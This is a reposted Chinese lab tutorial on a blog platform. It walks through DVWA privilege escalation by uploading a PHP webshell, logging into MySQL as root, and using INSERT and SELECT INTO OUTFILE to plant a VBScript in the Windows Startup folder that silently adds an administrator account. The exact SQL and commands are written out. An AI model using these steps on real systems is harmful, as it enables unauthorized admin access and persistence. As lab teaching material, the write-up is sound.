php 大马 mysql提权,Mysql提权-基于Mysql的webshell提权

基于Mysql的webshell提权

【实验目的】

通过本实验理解webshell的使用方法,掌握如何通过webshell执行sql命令进行提权,熟悉基本的webshell提权思路。

【实验环境】

攻击机:Win2008-att

用户名college,密码360College

使用的webshell文件:dama.php

目标靶机:Win2003-DVWA

用户名college,密码360College

【实验步骤】

1.在靶机Win2003-DVWA上,启动phpstudy,开启漏洞环境。

980fbebf3a4fbd13b5f708f2b75adf67.png

2.在攻击机上,启动Firefox浏览器,登录靶机上的DVWA网站。

网站的URL为:http://【靶机IP地址】/dvwa

登录用户名为admin,密码为password

76f1d0e1b8d08779d1c886b15ece9156.png

3.成功登录DVWA网站后,选择网站左侧菜单“DVWA Security”,将DVWA网站安全等级设置为“Low”。

d99e02aed5e5edecbb614bb7381fe672.png

4.选择网站左侧菜单“File Upload”,将攻击机Win2008-att桌面文件夹Tools中的dama.php(实验中所用的webshell)上传至靶机。

d97e7924273f28c3c0a946e73f78e8b9.png

5.dama.php上传成功后,在攻击机浏览的地址栏中输入如下URL连接dama.php:

http://【靶机IP地址】/dvwa/hackable/uploads/dama.php

16176db13fa97988fdcd30a65e5ee507.png

出现登录提示框时,输入密码hucyuansheng登录。

6.成功登录dama.php后,选择左侧菜单“提权工具”->“MySQL操作”,输入MySQL数据库的登录密码root,以root用户权限登录。

05abd2ab59590592ed0f2a0811570a0c.png

7.选择数据库test,并执行如下操作:

a2fa4440f55f85303c207824dd4f0004.png

(1)利用如下命令在test下创建一个新的表a:

create table a(cmd text);

该数据表表名为a,表中只存放一个字段,字段名为cmd,为text文本。

(2)利用如下命令在表a中插入内容:

insert into a values("set wshshell=createobject (""wscript.shell"")");

insert into a values("a=wshshell.run(""cmd.exe /c net user 1 1 /add"",0)");

insert into a values("b=wshshell.run(""cmd.exe /c net localgroup administrators 1 /add"",0)");

注意双引号和括号以及后面的"0"一定要输入!将用这三条命令来建立一个vbs脚本程序!后面的"0"表示不弹出CMD窗口,安静地运行。

上述三条命令执行成功后,可以看到如下图所示的结果,表a中已保存了相应的内容。也可以通过执行如下命令查看表a中的内容:

select * from a;

994430947952820c26fbb5b284ff541e.png

(3)利用如下命令创建一个vbs脚本程序,并将其输出至靶机操作系统的开始启动项中:

select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";

77bfe49f53def8be7f88cb78650f5acc.png

8.在靶机上验证攻击效果。

(1)点击“开始”菜单->“启动”,会发现启动项中有一个a.vbs的脚本程序;

043950ec3afc972acad82df58d8351c5.png

(2)重启靶机后,在cmd下输入net user命令,会看到靶机操作系统中被添加了一个用户“1”。

d8945141401dbe4e7fd44796770f8f57.png

实验至此结束。

思考与总结

通过本次实验成功实现了基于webshell执行mysql命令来写入一个自启动功能的vbs脚本,掌握了基于webshell进行提权的方法,能够结合操作系统安全策略,配置数据库和操作系统的各项访问权限。

标签:webshell,php,DVWA,提权,Mysql,靶机,dama

来源: https://www.cnblogs.com/miansj/p/13996089.html

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值